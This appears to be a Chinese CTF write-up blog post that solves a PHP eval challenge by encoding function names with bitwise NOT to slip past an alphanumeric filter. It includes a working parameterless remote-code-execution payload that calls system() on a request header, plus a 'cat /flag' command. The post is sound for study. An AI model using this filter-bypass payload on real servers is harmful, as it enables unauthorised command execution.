解析一道关于取反与无参数RCE题目

阅读量

前日,Gq师傅出了一道简单的web题,做完后简析一下

题目

1
2
3
4
5
6
7
8
9
10
11
 <?php
show_source(__FILE__);
    $code = $_GET['code'];
    if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
        die('Your Guojingming');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);

    }

?>

题目对数字,字母都进行了过滤,还对传入的字符串进行了限制,不得长于70,且过滤了^,因此考虑取反绕过,还对传入code进行了正则匹配

解析

根据Gq师傅给出的小tips

  • ?code=[~%8F%97%8F%96%91%99%90]!%FF;
  • php 二维数组能够构造字符串
  • ['phpinfo'][false] 可以构建一个字符串 phpinfo

1
?code=[~%8F%97%8F%96%91%99%90][!%FF]();

这个payload是对phpinfo取反后构建的字符串

附取反脚本

1
2
3
4
5
6
7
<?php

$a = (~'phpinfo');

echo urlencode($a);

?>

解题

题目多重套娃,典型的无参数RCE题目,且过滤了^,因此考虑取反绕过

我们可以用getallheaders()来解题

逐一进行取反并构造函数即可

例如system

最后得出payload

1
2
[~%8C%86%8C%8B%9A%92][!%FF]([~%9A%91%9B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));
//system(end(getallheaders()));

再在http请求头处加上一个cat /flag即可

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
总访问量:

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

新鲜出炉小菜比